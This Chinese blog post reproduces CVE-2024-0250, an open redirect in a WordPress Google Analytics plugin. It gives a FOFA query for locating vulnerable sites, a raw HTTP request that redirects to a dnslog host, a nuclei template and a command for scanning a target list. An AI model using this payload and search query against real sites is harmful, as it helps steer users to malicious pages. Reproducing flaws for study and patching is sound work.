CVE-2024-0250 漏洞复现

Administrator 字数: 4569 阅读耗时: 11 分钟 2024/06/21 博客独享热度: 71 评论: 0

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与发布者无关！！！

01

漏洞名称

Google Analytics开放重定向漏洞

02

漏洞影响

Google Analytics 4 < 6.3

03

漏洞描述

由于重定向oauth2callback.php文件验证不足，该插件易受Open Redirect攻击。这使得未经身份验证的攻击者有可能将用户重定向到潜在的恶意网站，如果他们能够成功地诱骗用户执行操作的话。

04

FOFA搜索语句

body="/wp-content/plugins/analytics-insights"

05

漏洞复现

可以结合dnslog来复现该漏洞，先随机注册一个dnslog账户https://eyes.sh/dns/ ，然后复制payload到poc数据包中，完整数据包如下：

GET /wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://ai8akwkt.eyes.sh/%3f&code=x HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.6.26Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

get请求也可以用浏览器打开，然后观察DNSlog记录

漏洞复现成功

06

nuclei poc

nuclei 官方已发布POC，内容如下

id: CVE-2024-0250
info:  name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect  author: securityforeveryone  severity: medium  description: |    The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.  remediation: |    Fixed in 6.3  reference:    - https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/    - https://github.com/fkie-cad/nvd-json-data-feeds    - https://nvd.nist.gov/vuln/detail/CVE-2024-0250  classification:    epss-score: 0.00043    epss-percentile: 0.0866  metadata:    max-request: 1    verified: true    fofa-query: body="/wp-content/plugins/analytics-insights"    publicwww-query: "/wp-content/plugins/analytics-insights"  tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights
http:  - method: GET    path:      - "{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"
    matchers:      - type: regex        part: header        regex:          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'# digest: 4a0a004730450220508ba6949e0997c93c3e04a75108bac0d84fd29cdf91842239f76d788c8d60f9022100bb118773932c0732f921c1e1dca30fa00cf7826b60410268e292e051434a276a:922c64590222798bb761d5b6d8e72950

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-0250.yaml -l data\1.txt

07

修复建议

升级到最新版本。